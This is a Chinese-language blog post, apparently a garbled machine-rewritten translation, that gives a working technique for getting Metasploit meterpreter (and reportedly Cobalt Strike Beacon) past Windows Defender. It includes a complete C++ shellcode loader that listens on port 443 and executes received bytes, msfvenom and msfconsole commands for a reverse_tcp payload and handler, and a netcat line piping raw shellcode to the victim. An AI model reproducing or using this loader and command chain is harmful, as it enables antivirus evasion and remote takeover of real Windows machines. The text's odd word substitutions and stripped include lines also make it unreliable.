网络黑客信息平台网:运用套接字递送shellcode绕开Windows Defender
在我们在安裝了Windows Defender的电子计算机上运作拆箱既用的meterpreter payload时,立刻便会被阻拦。
文中将为阅读者展现怎样根据TCP套接字递送shellcode来绕开全新的Windows Defender(编写文中时是5月7日)实行现有的meterpreter payload的。
该技术性一样适用Cobalt Strike Beacon
尽管本试验中是应用Metasploit的meterpreter payload开展演试的,可是我已经用Cobalt Strike beacon对文中详细介绍的技术性开展了检测,一样也可以成功绕开Windows Defender。
事实上,这儿用以绕开Windows Defender的技术性比较简单:
在受害电子计算机(10.0.0.7)的端口号443(或别的一切端口号)上监听TCP套接字
让受害电子计算机上的套接字等候传到shellcode
进攻设备(10.0.0.5)联接到受害套接字,并将shellcode做为二进制数据信息推送
受害者电子计算机接受shellcode,分派可实行运行内存并将shellcode挪动到分派的运行内存中
受害电子计算机实行根据互联网接受的shellcode,并运行meterpreter(或cobalt strike beacon)免费下载第二阶段的合理载荷
进攻设备出示合理载荷,并接到shell
下面,使我们撰写并编译程序一个简易的PoC C 程序流程(参照编码一部分),它将替大家进行所述全部流程。
编译程序后,我们在受害设备上实行该程序流程,并查验端口号443上的套接字是不是已开启:
attacker@victim
netstat -nat | findstr /i listen | findstr /i 443
使我们转化成一个多环节的meterpreter payload,并将其輸出为C文件格式:
attacker@kali
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c > meterpreter.c
下边,使我们建立一个msf程序处理来捕捉进攻电子计算机上的meterpreter对话:
attacker@kali
msfconsole -x "use exploits/multi/handler; set lhost 10.0.0.5; set lport 443; set payload windows/meterpreter/reverse_tcp; exploit"
如今,我们可以从C文档中获得shellcode,并将其做为二进制数据信息回显,随后根据netcat将其根据管路传送到受害设备(TCP套接字已经监听443端口号):
attacker@kali
echo -e "\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x9a\\x50\\x30\\x9a\\x52\\x0c\\x9a\\x52\\x14\\x9a\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x9a\\x52\\x10\\x9a\\x4a\\x3c\\x9a\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x9a\\x59\\x20\\x01\\xd3\\x9a\\x49\\x18\\xe3\\x3a\\x49\\x9a\\x34\\x9a\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x9a\\x58\\x24\\x01\\xd3\\x66\\x9a\\x0c\\x4b\\x9a\\x58\\x1c\\x01\\xd3\\x9a\\x04\\x9a\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x9a\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\x89\\xe8\\xff\\xd0\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x0a\\x68\\x0a\\x00\\x00\\x05\\x68\\x02\\x00\\x01\\xbb\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\\xe8\\x67\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x9a\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x28\\x58\\x68\\x00\\x40\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\x0f\\x85\\x70\\xff\\xff\\xff\\xe9\\x9b\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc1\\xc3\\xbb\\xf0\\xb5\\xa2\\x56\\x6a\\x00\\x53\\xff\\xd5" | nc 10.0.0.7 443
到此,全部网站渗透测试的准备工作即使完成了。下边对所述全部实际操作开展简易详细介绍:
显示屏正中间的Cmd shell开启受害电子计算机上的TCP套接字(端口号443)
cmd shell下边的Windows Defender表明签字是全新的
右上方:msfconsole已经等候进攻设备推送第二阶段的重力梯度
右下方:网络攻击根据netcat将shellcode发给受害者
右上方:msfconsole为受害者出示第二阶段重力梯度,并创建meterpreter对话
阅读者很有可能会问:为何这类方式可以见效呢?我只有说自身也不清楚。但是,做为Windows Defender的超级粉丝,我觉得它在阻拦恶意程序层面做得還是十分优异的,相信它迅速就能鉴别这类绕开技术性。
#include "pch.h"
#include
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
int main()
{
LPWSADATA wsaData=new WSAData();
ADDRINFOA *socketHint=new ADDRINFOA();
ADDRINFOA *addressInfo=new ADDRINFOA();
SOCKET listenSocket=INVALID_SOCKET;
SOCKET clientSocket=INVALID_SOCKET;
CHAR bufferReceivedBytes[4096]={0};
INT receivedBytes=0;
PCSTR port="443";
socketHint->ai_family=AF_INET;
socketHint->ai_socktype=SOCK_STREAM;
socketHint->ai_protocol=IPPROTO_TCP;
socketHint->ai_flags=AI_PASSIVE;
WSAStartup(MAKEWORD(2, 2), wsaData);
GetAddrInfoA(NULL, port, socketHint, &addressInfo);
listenSocket=socket(addressInfo->ai_family, addressInfo->ai_socktype, addressInfo->ai_protocol);
bind(listenSocket, addressInfo->ai_addr, addressInfo->ai_addrlen);
listen(listenSocket, SOMAXCONN);
std::cout << "Listening on TCP port " << port << std::endl;
clientSocket=accept(listenSocket, NULL, NULL);
std::cout << "Incoming connection..." << std::endl;
receivedBytes=recv(clientSocket, bufferReceivedBytes, sizeof(bufferReceivedBytes), NULL);
if (receivedBytes > 0){
std::cout << "Received shellcode bytes " << receivedBytes << std::endl;
}
LPVOID shellcode=VirtualAlloc(NULL, receivedBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
std::cout << "Allocated memory for shellocode at: " << shellcode << std::endl;
memcpy(shellcode, bufferReceivedBytes, sizeof(bufferReceivedBytes));
std::cout << "Copied shellcode to: " << shellcode << std::endl << "Sending back meterpreter session...";
((void(*)()) shellcode)();
return 0;
}
getaddrinfo function (ws2tcpip.h) - Win32 apps
原文地址: